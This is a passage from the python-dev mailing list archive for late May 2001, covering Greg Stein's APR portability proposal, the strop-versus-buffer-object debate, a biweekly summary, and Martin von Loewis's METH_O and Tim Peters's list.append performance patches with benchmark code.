> > mmap, user information access (e.g. getpwnam), uuid handling, getopt
> > replacements, cryptographic random data, and a few other bits here and
> > there. The shared mem actually is implemented mostly, via the libmm library.
> 
> How big is APR?

That's relative :-)  On my Linux box, a stripped library is 85k.

It is also (theoretically) possible to skip building portions of APR. The
APIs and symbols are set up for that, but the autoconf setup isn't yet. If
you're embedding a private APR build, then you can fine tune what is needed.
However, if you're building a public/shared one, then you wouldn't really
want to trim it back like that.

> How stable?

The existing functionality is quite stable. We just keep adding more, though
:-)

> (in terms of interface; I'm assuming it
> doesn't crap out through bad programming or it'd be a non-starter)

hehe... you can call it a non-starter, then. APR assumes you pass it valid
pointers and objects. For example, if you call apr_file_read(NULL, NULL,
100), then you'll get a segfault rather than EINVAL. Personally, I find that
behavior quite fine (EINVAL will invariably get ignored; a segfault doesn't;
and this is a programmer error that needs to be attended to -- throw it in
his face)

Whether others think that is a non-starter... hard to know :-)

[ actually, one of the hardest things to integrate would be APR's memory
  management approach with Python's ]

> > And note that some of those topics have some nice depth. As I mentioned,
> > network_io supports IPv6, but also portable name lookups, sendfile(), etc.
> > The file_io stuff support optimized stat() and opendir-type calls for the
> > platform.
> >
> > > It currently supports: Unix (includes BeOS), Win32 and OS/2.
> >
> > A lot more than that :-)  Pretty much all the Unix variants, including
> > OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.
> 
> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS, VMS,
> Playstation 2(!), from looking at
> http://www.python.org/download/download_other.html.

Sure it's smaller.

It's a blue sky radical suggestion. No more, no less. :-) I mentioned it
because the IPv6 stuff came up. I already know a codebase that has handled
all the portability issues. That is a bonus :-)

However, for the platforms that APR *does* handle today, that would still be
a big code reduction for Python. And in the future? Why not extend APR to
those other platforms and reduce the Python code even more.


I think shifting Python to a portability library is actually quite an
interesting thought experiment. Enough to mention it and get people
thinking. I think it could be quite handy for the longer term
maintainability.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From mal@lemburg.com  Thu May 24 15:54:24 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 24 May 2001 16:54:24 +0200
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org>
Message-ID: <3B0D20A0.3C881F89@lemburg.com>

Greg Stein wrote:
> 
> On Thu, May 24, 2001 at 12:18:50PM +0200, M.-A. Lemburg wrote:
> > Greg Stein wrote:
> >...
> > > So... my question is: is there any way that we can retain a generic find()
> > > (and similar functions from the string/strop module) that operates on any
> > > type that implements the buffer API?
> > >
> > > Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
> > > implements some standard methods for 8-bit character data (using the buffer
> > > API), which can be mixed into new Python types" That would reduce the burden
> > > for new types.
> >
> > I suppose that in 2.2 we'll be able to build a class/type
> > hierarchy which then provides these possibilities. I haven't
> > followed Guido's latest checkins closely though -- could be that
> > types don't support multiple inheritence.
> 
> No idea either... that's why I asked.
> 
> > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > Then you could write: buffer(ob).find('.').
> 
> You're totally missing the point with that suggestion. It does *not* suffice
> to add them to buffer objects. What about array objects? mmap objects?
> Random Joe Object who implements the buffer interface?

That's the point: you can wrap all those into a buffer object
and then use the buffer object methods to manipulate them. In
that sense, buffer objects provide an adaptor to the underlying
object which implements the needed methods.
 
> All of those are out of luck.
> 
> With strop, I can pass any of those objects to strop.find(). That function
> has a polymorphic argument.
> 
> In the current arrangement, every object must implement their own .find and
> .upper and .whatever.
> 
> Cheers,
> -g
> 
> --
> Greg Stein, http://www.lyra.org/

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From skip@pobox.com (Skip Montanaro)  Thu May 24 16:55:23 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 24 May 2001 10:55:23 -0500
Subject: [Python-Dev] strop vs. string
In-Reply-To: <20010524060016.D5402@lyra.org>
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>
 <20010524013349.Y5402@lyra.org>
 <3B0CE00A.488C8D73@lemburg.com>
 <20010524060016.D5402@lyra.org>
Message-ID: <15117.12011.323759.496982@beluga.mojam.com>

    Greg> With strop, I can pass any of those objects to strop.find(). That
    Greg> function has a polymorphic argument.

Where doesn't strop compile/run?  If it works everywhere, either just rename
it to be the string module (copying any bits from the existing string module
that it doesn't yet have) or rename it something like buffer_funcs.

Skip


From skip@pobox.com (Skip Montanaro)  Thu May 24 16:58:24 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 24 May 2001 10:58:24 -0500
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
References: <20010524055555.B5402@lyra.org>
 <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain>
Message-ID: <15117.12192.114564.111578@beluga.mojam.com>

    >> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
    >> 
    >> A lot more than that :-) Pretty much all the Unix variants, including
    >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.

    Michael> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS,
    Michael> VMS, Playstation 2(!),

Not to mention MacOS < X... ;-)

Skip


From mwh@python.net  Thu May 24 17:38:37 2001
From: mwh@python.net (Michael Hudson)
Date: Thu, 24 May 2001 17:38:37 +0100 (BST)
Subject: [Python-Dev] python-dev summary 2001-05-10 - 2001-05-24
Message-ID: <Pine.LNX.4.30.0105241737010.21946-100000@localhost.localdomain>

 This is a summary of traffic on the python-dev mailing list between
 May 10 and May 24 (inclusive) 2001.  It is intended to inform the
 wider Python community of ongoing developments.  To comment, just
 post to python-list@python.org or comp.lang.python in the usual
 way. Give your posting a meaningful subject line, and if it's about a
 PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep
 iteration) All python-dev members are interested in seeing ideas
 discussed by the community, so don't hesitate to take a stance on a
 PEP if you have an opinion.

 This is the eighth summary written by Michael Hudson.
 Summaries are archived at:

  <http://starship.python.net/crew/mwh/summaries/>

   Posting distribution (with apologies to mbm)

   Number of articles in summary: 322

       |                         [|]
       |                         [|]
    30 |                         [|]
       |                     [|] [|] [|]                     [|]
       |                     [|] [|] [|]                     [|]
       |                 [|] [|] [|] [|]                     [|]
       |                 [|] [|] [|] [|]                     [|]
       |     [|]         [|] [|] [|] [|] [|]                 [|]
    20 | [|] [|]         [|] [|] [|] [|] [|]                 [|]
       | [|] [|]         [|] [|] [|] [|] [|]             [|] [|]
       | [|] [|]     [|] [|] [|] [|] [|] [|]         [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]         [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
    10 | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|]     [|] [|] [|] [|]
       | [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|] [|]
     0 +-023-025-017-018-028-031-036-032-025-002-015-018-020-032
        Thu 10| Sat 12| Mon 14| Wed 16| Fri 18| Sun 20| Tue 22|
            Fri 11  Sun 13  Tue 15  Thu 17  Sat 19  Mon 21  Wed 23

 Pretty busy fortnight.  The above distribution may be somewhat skewed
 because I changed my subscription address to python-dev and was
 unsubscribed for a while.  Although any impact this had is probably
 countered by ESR and Barry's discussion of "Puffy the Frog"...


    * Type/class *

 Paul Prescod has been keeping an eye on Guido's descr-branch work,
 and posted concerns about when objects will have a __dict__:

  <http://mail.python.org/pipermail/python-dev/2001-May/014694.html>

 Then there was more technical discussion about subclassing builtin
 types and Steven Majewski evangelising prototype-based OO languages
 (though I'm not sure why!).


    * Easy codec access *

 Marc-Andre Lemburg checked in his decode string method patch, and
 some new codecs so you can now do things like:

    >>> "abc".encode('zlib').encode('base64')
    'eJxLTEoGAAJNASc=\n'
    >>> _.decode('base64').decode('zlib')
    'abc'

 There was a small discussion on what other codecs might be handy and
 Guido added quoted-printable to check it was easy.


    * Performance *

 The big discussion(s) on python-dev over the past fourteen days has
 centred on performance, especially on that of comparisons and the
 related area of dict performance.  It all started with Tim Peters
 running a simple test program on 2.0, 2.1 and current CVS:

  <http://mail.python.org/pipermail/python-dev/2001-May/014781.html>

 The discussion had an unusual <wink> flavour for one about
 performance: a concentration on measuring performance numbers and
 making sure that the optimizations being discussed actually improved
 these numbers.  This is hard; everyone wants to speed the "typical
 Python app" but of course there is no such thing; people have been
 using, amongst others, pystone, pybench and the test suite, none of
 which are particularly good candidates...

 Tim posted the distribution of sizes of dicts in a run of the test
 suite:

  <http://mail.python.org/pipermail/python-dev/2001-May/014890.html>

 which showed that small dicts are overwhelmingly the commonest.  Marc
 piped up with an old optimization idea of his:

  <http://mail.python.org/pipermail/python-dev/2001-May/014891.html>

 He posted a patch to sourceforge, Tim rewrote it and checked it in,
 so dicts should be a little faster in 2.2.

 But as I said, the discussion was kicked off by the performance of
 comparisons, especially strings.  Martin von Loewis posted some
 statistics from an instrumented interpreter:

  <http://mail.python.org/pipermail/python-dev/2001-May/014808.html>

 The issue is that the rich comparisons of Python 2.1 have added a
 layer of complexity to the comparisons code.  Although the rich
 comparisons (might) provide an opportunity for faster code in some
 circumstances, code that still uses old-style comparisons can and
 does take a hit.  Strings still use the old-style comparisons and are
 compared a *lot* (especially in dicts), so it seems "upgrading" them
 to rich comparisons should be a win and Marc posted a patch to sf
 that does this.

 Marc also managed to promise <wink> to make a concerted effort to
 find speed optimizations in the next few months:

  <http://mail.python.org/pipermail/python-dev/2001-May/014928.html>

 Finally, in a coda Jeremy noticed that Python spends an alarming
 amount of time decoding those "Oi|s#" strings that get passed to
 PyArg_ParseTuple:

  <http://mail.python.org/pipermail/python-dev/2001-May/014911.html>

 and Tim pointed out that optimizing "O" might be a win:

  <http://mail.python.org/pipermail/python-dev/2001-May/014924.html>

    * FP vs. tutorial *

 Tim pointed out that the tutorial currently contains examples of
 floating point output that is platform dependent, and that this is
 bad.  He proposed changing the tutorial to only use fractions that
 can be exactly represented as floats, and adding a discussion
 (possibly in an appendix) of the reasons why

    >>> 0.1
    0.10000000000000001

 is not broken.  There was a discussion of how detailed the discussion
 should be where the point was made that it's not really important to
 explain precisely *why* this happens, but it suffices to convince the
 newbie that floating point is more complicated than he or she thinks.
 Lets hope that suitable text is composed soon, and that people
 actually read it ... there have been two "floating point is broken"
 bug reports on sourceforge in just the last week.


    * unifying os.rename semantics across platforms *

 Skip pointed out that os.rename behaves differently on Posix and
 Windows platforms when the destination file exists:

  <http://mail.python.org/pipermail/python-dev/2001-May/014957.html>

 on Posix the destination is silently replaced in an atomic operation,
 whereas on Windows an exception is raised.  Skip proposed enforcing
 posix semantics everywhere, but this has two problems (a) it's
 backwards incompatible (b) it's impossible (you can't avoid the race
 condition on Windows).  So maybe we'll just settle for better
 documentation.


    * Python 2.1.1 *

 Thomas Wouters started back-porting bug fixes to the 2,1-maint branch
 in preparation for a 2.1.1 release.  There is as yet no firm - or
 even vague - plans about release dates.


    * Daily Python-URL on your Palm *

 Marc-Andre Lemburg announced that you can now read Pythonware's Daily
 Python-URL on your Palm Pilot as an AvantGo channel:

  <http://mail.python.org/pipermail/python-dev/2001-May/014983.html>

Cheers,
M.


From gstein@lyra.org  Thu May 24 20:45:18 2001
From: gstein@lyra.org (Greg Stein)
Date: Thu, 24 May 2001 12:45:18 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0D20A0.3C881F89@lemburg.com>; from mal@lemburg.com on Thu, May 24, 2001 at 04:54:24PM +0200
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com>
Message-ID: <20010524124518.N5402@lyra.org>

On Thu, May 24, 2001 at 04:54:24PM +0200, M.-A. Lemburg wrote:
>...
> That's the point: you can wrap all those into a buffer object
> and then use the buffer object methods to manipulate them. In
> that sense, buffer objects provide an adaptor to the underlying
> object which implements the needed methods.

That would certainly be a valid solution. And at the C level, we could share
functions between PyBufferObject and PyStringObject.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From gstein@lyra.org  Thu May 24 21:07:43 2001
From: gstein@lyra.org (Greg Stein)
Date: Thu, 24 May 2001 13:07:43 -0700
Subject: [Python-Dev] APR (was: IPv6)
In-Reply-To: <15117.12192.114564.111578@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 10:58:24AM -0500
References: <20010524055555.B5402@lyra.org> <Pine.LNX.4.30.0105241353530.21789-100000@localhost.localdomain> <15117.12192.114564.111578@beluga.mojam.com>
Message-ID: <20010524130743.O5402@lyra.org>

On Thu, May 24, 2001 at 10:58:24AM -0500, skip@pobox.com wrote:
> 
>     >> > It currently supports: Unix (includes BeOS), Win32 and OS/2.
>     >> 
>     >> A lot more than that :-) Pretty much all the Unix variants, including
>     >> OS/390 and BS2000 and MacOS X, and TPF, and some other oddballs.
> 
>     Michael> That's still less than Python isn't it?  RiscOS, Amiga, PalmOS,
>     Michael> VMS, Playstation 2(!),
> 
> Not to mention MacOS < X... ;-)

As I mentioned, MacOS X is already there. MacOS Classic is not.

But the presence of a portability library such as APR does not exclude the
use of direct platform hooks where/when necessary. For a bunch of stuff, you
use APR [to reduce complexity/maintenance]. For the rest, you go native just
like today.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From skip@pobox.com (Skip Montanaro)  Thu May 24 22:15:48 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 24 May 2001 16:15:48 -0500
Subject: [Python-Dev] Odd message from test_dbm
Message-ID: <15117.31236.804746.160037@beluga.mojam.com>

I just noticed this message when running make test:

    test test_dbm skipped --  /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey

I'm running a vanilla Mandrake 8.0 system.  Unfortunately, I can't check
libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip
them...

Anybody else seen this?  

Skip


From thomas@xs4all.net  Thu May 24 22:42:58 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Thu, 24 May 2001 23:42:58 +0200
Subject: [Python-Dev] Odd message from test_dbm
In-Reply-To: <15117.31236.804746.160037@beluga.mojam.com>; from skip@pobox.com on Thu, May 24, 2001 at 04:15:48PM -0500
References: <15117.31236.804746.160037@beluga.mojam.com>
Message-ID: <20010524234258.I690@xs4all.nl>

On Thu, May 24, 2001 at 04:15:48PM -0500, skip@pobox.com wrote:

> I just noticed this message when running make test:

>     test test_dbm skipped --  /home/skip/src/python/dist/src/build/build/lib.linux-i686-2.1/dbm.so: undefined symbol: dbm_firstkey

> I'm running a vanilla Mandrake 8.0 system.  Unfortunately, I can't check
> libc.so or /usr/lib/libgdbm.so because the Mandrake folks saw fit to strip
> them...

The problem is that the dbmmodule isn't linked to the right library. Debian
has a similar (if not the same) problem. setup.py doesn't try hard enough to
figure out the right library to link with; it checks for libndbm, but not
libdbm or libgdbm (it assumes DBM support is in libc if not in libndbm.)
I *think* all it needs to do is check for libdbm as well as libndbm, but
this might pick up old/incompatible libraries on some platforms, and it
might still require fiddling of include paths on others. I seem to recall
you had to include either /usr/include/db1/ndbm.h (to use libdbm) or
/usr/include/gdbm/ndbm.h or /usr/include/gdbm-ndbm.h (to use gdbm's ndbm
'emulation') but I gave up in frustration trying to figure out the
difference :P

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From greg@cosc.canterbury.ac.nz  Fri May 25 03:45:01 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 25 May 2001 14:45:01 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0CE00A.488C8D73@lemburg.com>
Message-ID: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal@lemburg.com>:

> BTW, wouldn't it suffice to add these methods to buffer objects ?
> Then you could write: buffer(ob).find('.').

Aren't buffer objects as they're currently implemented
inherently dangerous?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From martin@loewis.home.cs.tu-berlin.de  Fri May 25 07:00:47 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 25 May 2001 08:00:47 +0200
Subject: [Python-Dev] Special-casing "O"
Message-ID: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>

> Special-casing the snot out of "O" looks like a winner <wink>:

I have a patch on SF that takes this approach:

http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470

The idea is that functions can be declared as METH_O, instead of
METH_VARARGS. I also offer METH_l, but this is currently not used. The
approach could be extended to other signatures, e.g. METH_O_opt_O
(i.e. "O|O").  Some signatures cannot be changed into special-calls,
e.g. "O!", or "ll|l".

In the PyXML test suite, "O" is indeed the most frequent case (72%),
and it is primarily triggered through len (26%), append (24%), and ord
(6%). These are the only functions that make use of the new calling
conventions at the moment. If you look at the patch, you'll see that
it is quite easy to change a method to use a different calling
convention (basically just remove the PyArg_ParseTuple call).

To measure the patch, I use the script

from time import clock

indices = [1] * 20000
indices1 = indices*100
r1 = [1]*60

def doit(case):
    s = clock()
    i = 0
    if case == 0:
        f = ord
        for i in indices1:
            f("o")
    elif case == 1:
        for i in indices:
            l = []
            f = l.append
            for i in r1:
                f(i)
    elif case == 2:
        f = len
        for i in indices1:
            f("o")
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f %.3f %.3f" % (doit(0),doit(1),doit(2))

Without the patch, (almost) stock CVS gives

2.190 1.800 2.240
2.200 1.800 2.220
2.200 1.800 2.230
2.220 1.800 2.220
2.200 1.800 2.220
2.200 1.790 2.240
2.200 1.790 2.230
2.200 1.800 2.220
2.200 1.800 2.240
2.200 1.790 2.230

With the patch, I get

1.440 1.330 1.460
1.420 1.350 1.440
1.430 1.340 1.430
1.510 1.350 1.460
1.440 1.360 1.470
1.460 1.330 1.450
1.430 1.330 1.420
1.440 1.340 1.440
1.430 1.340 1.430
1.410 1.340 1.450

So the speed-up is roughly 30% to 50%, depending on how much work the
function has to do.

Please let me know what you think.

Regards,
Martin


From mal@lemburg.com  Fri May 25 09:23:10 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 10:23:10 +0200
Subject: [Python-Dev] strop vs. string
References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz>
Message-ID: <3B0E166E.581816AA@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal@lemburg.com>:
> 
> > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > Then you could write: buffer(ob).find('.').
> 
> Aren't buffer objects as they're currently implemented
> inherently dangerous?

Why should they be ?

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Fri May 25 09:56:12 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 25 May 2001 10:56:12 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
Message-ID: <3B0E1E2C.4BC121B5@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Special-casing the snot out of "O" looks like a winner <wink>:
> 
> I have a patch on SF that takes this approach:
> 
> http://sourceforge.net/tracker/index.php?func=detail&aid=427190&group_id=5470&atid=305470
> 
> The idea is that functions can be declared as METH_O, instead of
> METH_VARARGS. I also offer METH_l, but this is currently not used. The
> approach could be extended to other signatures, e.g. METH_O_opt_O
> (i.e. "O|O").  Some signatures cannot be changed into special-calls,
> e.g. "O!", or "ll|l".
> 
> [benchmark]
> So the speed-up is roughly 30% to 50%, depending on how much work the
> function has to do.
> 
> Please let me know what you think.

Great idea, Martin.

One suggestion though: I would change is the way the
function is "declared" in the method list. Your currently use:

 {"append", (PyCFunction)listappend,  METH_O, append_doc},

Now this would be more flexible if you would implement a scheme
which lets us put the parser string into the method list. The
call mechanism could then easily figure out how to call the
method and it would also be more easily extensible:

 {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},

This would then (just like in your patch) call the listappend
function with the parser arguments inlined into the C call:

 listappend(self, arg0)

A parser marker "OO" would then call a method like this:

 method(self, arg0, arg1)

and so on.

This approach costs a little more (the string compare), but
should provide a more direct way of converting existing
functions to the new convention (just copy&paste the PyArg_ParseTuple()
argument) and also allows implementing a generic scheme which
then again relies on PyArg_ParseTuple() to do the argument
parsing, e.g. "is#" could be implemented as:

PyObject *method(PyObject self, int arg0, char *arg1, int *arg1_len)

For optional arguments we'd need some convention which then
lets the called function add the default value as needed.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From ping@lfw.org  Fri May 25 11:56:33 2001
From: ping@lfw.org (Ka-Ping Yee)
Date: Fri, 25 May 2001 05:56:33 -0500 (CDT)
Subject: [Python-Dev] May 25 is Towel Day (towelday.org)
Message-ID: <Pine.LNX.4.10.10105250556050.19548-100000@server1.lfw.org>

If you have enjoyed Douglas Adams' works, please consider carrying
or wearing a towel with you everywhere today, May 25, as a tribute
and in his memory.

For more about Towel Day, visit http://www.towelday.org/.

My apologies for being off-topic.


-- ?!ng


From gstein@lyra.org  Fri May 25 12:59:23 2001
From: gstein@lyra.org (Greg Stein)
Date: Fri, 25 May 2001 04:59:23 -0700
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0E166E.581816AA@lemburg.com>; from mal@lemburg.com on Fri, May 25, 2001 at 10:23:10AM +0200
References: <200105250245.OAA00640@s454.cosc.canterbury.ac.nz> <3B0E166E.581816AA@lemburg.com>
Message-ID: <20010525045923.C12056@lyra.org>

On Fri, May 25, 2001 at 10:23:10AM +0200, M.-A. Lemburg wrote:
> Greg Ewing wrote:
> > "M.-A. Lemburg" <mal@lemburg.com>:
> > 
> > > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > > Then you could write: buffer(ob).find('.').
> > 
> > Aren't buffer objects as they're currently implemented
> > inherently dangerous?
> 
> Why should they be ?

The buffer object caches the pointer from getreadbuffer and friends. If the
target object changes that pointer (internally), then the buffer object's
value is stale.

But that is a bug fix; it is independent of the discussion at hand.

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From Barrett@stsci.edu  Fri May 25 14:21:20 2001
From: Barrett@stsci.edu (Paul Barrett)
Date: Fri, 25 May 2001 09:21:20 -0400
Subject: [Python-Dev] strop vs. string
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net> <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com>
Message-ID: <3B0E5C50.6E365F69@STScI.Edu>

"M.-A. Lemburg" wrote:
> 
> > > BTW, wouldn't it suffice to add these methods to buffer objects ?
> > > Then you could write: buffer(ob).find('.').
> >
> > You're totally missing the point with that suggestion. It does *not*      > > suffice to add them to buffer objects. What about array objects? mmap      > > objects?  Random Joe Object who implements the buffer interface?
> 
> That's the point: you can wrap all those into a buffer object
> and then use the buffer object methods to manipulate them. In
> that sense, buffer objects provide an adaptor to the underlying
> object which implements the needed methods.

Sounds like you are trying to make the buffer object into something it
is not. Not that I have the foggiest idea what it is now, since it
hasn't much use and is badly broken.

I like your idea of sharing functions, I just don't think the buffer
object is the proper means.  I think the buffer object should be
removed from Python and something better put in its place. (I'm not
talking about the buffer C/API, though this could also use an
overhaul, since it doesn't provide enough information to the receiving
method.)

What I think we need is:

1) a malloc object which has a similar interface to the mmap object
with access protection, etc.  This object would be the fundamental way
of getting memory.  The string object would use it to allocate a chunk
of 'read-only' memory.  Other objects would then know not to modify
the contents of the memory.  If you wanted a reference or view of the
memory/buffer, you would get a reference to this object.

2) objects supporting the buffer object should provide a view method
which returns a copy of themselves (and hence all their methods) and
can be used to get a pointer to a subset of its memory.  In this way
the type of memory/buffer being accessed is known compared to the
current buffer object which only indicates the buffer is binary or
char data.  In essence information about how the buffer should be used
is lost in the current buffer C/API.

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From guido@digicool.com  Fri May 25 15:29:28 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 25 May 2001 10:29:28 -0400
Subject: [Python-Dev] Vacation
Message-ID: <200105251429.f4PETSd10633@odiug.digicool.com>

I will be on vacation next week without net access.  Back on June 4th!

There's a bunch of stuff that happened on the mailing list that I
expect I won't get to -- I've got to finish up some high priority
work for Digital Creations before I can leave.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Fri May 25 20:06:16 2001
From: tim.one@home.com (Tim Peters)
Date: Fri, 25 May 2001 15:06:16 -0400
Subject: [Python-Dev] Time for the yearly list.append() panic
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIEKEAA.tim.one@home.com>

c.l.py has rediscovered the quadratic-time worst-case behavior of list.append().  That is, do list.append(x) in a long
loop.  Linux users don't see anything particularly bad no matter how big the loop.  WinNT eventually displays clear
quadratic-time behavior.  Win9x dies surprisingly early with a MemoryError, despite gobs of memory free:  turns out
Win9x allocates hundreds of virtual heaps, isn't able to coalesce them, and you actually run out of *address space* (the
whole 2GB user space gets fragmented beyond hope).  People on other platforms have reported other bad behaviors over the
years.

I don't want to argue about this again <wink>, I just want to know whether the patch below slows anything down on your
oddball box.  It increases the over-allocation amount in several more layers.  Also replaces integer * and / in the
over-allocation computation by bit operations (integer / in particular is very slow on *some* boxes).

Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution.

Index: Objects/listobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/listobject.c,v
retrieving revision 2.92
diff -c -r2.92 listobject.c
*** Objects/listobject.c	2001/02/12 22:06:02	2.92
--- Objects/listobject.c	2001/05/25 19:04:07
***************
*** 9,24 ****
  #include <sys/types.h>		/* For size_t */
  #endif

! #define ROUNDUP(n, PyTryBlock) \
! 	((((n)+(PyTryBlock)-1)/(PyTryBlock))*(PyTryBlock))

  static int
  roundupsize(int n)
  {
! 	if (n < 500)
  		return ROUNDUP(n, 10);
  	else
! 		return ROUNDUP(n, 100);
  }

  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))
--- 9,30 ----
  #include <sys/types.h>		/* For size_t */
  #endif

! #define ROUNDUP(n, nbits) \
! 	( ((n) + (1<<(nbits)) - 1) >> (nbits) << (nbits) )

  static int
  roundupsize(int n)
  {
! 	if ((n >> 9) == 0)
! 		return ROUNDUP(n, 3);
! 	else if ((n >> 13) == 0)
! 		return ROUNDUP(n, 7);
! 	else if ((n >> 17) == 0)
  		return ROUNDUP(n, 10);
+ 	else if ((n >> 20) == 0)
+ 		return ROUNDUP(n, 13);
  	else
! 		return ROUNDUP(n, 18);
  }

  #define NRESIZE(var, type, nitems) PyMem_RESIZE(var, type, roundupsize(nitems))


From martin@loewis.home.cs.tu-berlin.de  Fri May 25 20:51:26 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 25 May 2001 21:51:26 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0E1E2C.4BC121B5@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com>
Message-ID: <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>

> Now this would be more flexible if you would implement a scheme
> which lets us put the parser string into the method list. The
> call mechanism could then easily figure out how to call the
> method and it would also be more easily extensible:
> 
>  {"append", (PyCFunction)listappend,  METH_DIRECT, append_doc, "O"},

I'd like to hear other people's comment on this specific issue, so I
guess I should probably write a PEP outlining the options.

My immediate reaction to your proposal is that it only complicates the
interface without any savings. We still can only support a limited
number of calling conventions. E.g. it is not possible to write
portable C code that does all the calling conventions for "l", "ll",
"lll", "llll", and so on - you have to cast the function pointer to
the right prototype, which must be done in source code.

So with this interface, you may end up at run-time finding out that
you cannot support the signature. With the current patch, you'd have
to know to convert "OO" into METH_OO, which I think is not asked too
much - and it gives you a compile-time error if you use an unsupported
calling convention.

> A parser marker "OO" would then call a method like this:
> 
>  method(self, arg0, arg1)
> 
> and so on.

That is indeed the plan, but since you have to code the parameter
combinations in C code, you can only support so many of them.

> allows implementing a generic scheme which
> then again relies on PyArg_ParseTuple() to do the argument
> parsing, e.g. "is#" could be implemented as:

The point of the patch is to get rid of PyArg_ParseTuple in the
"common case". For functions with complex calling conventions, getting
rid of the PyArg_ParseTuple string parsing is not that important,
since they are expensive, anyway (not that "is#" couldn't be
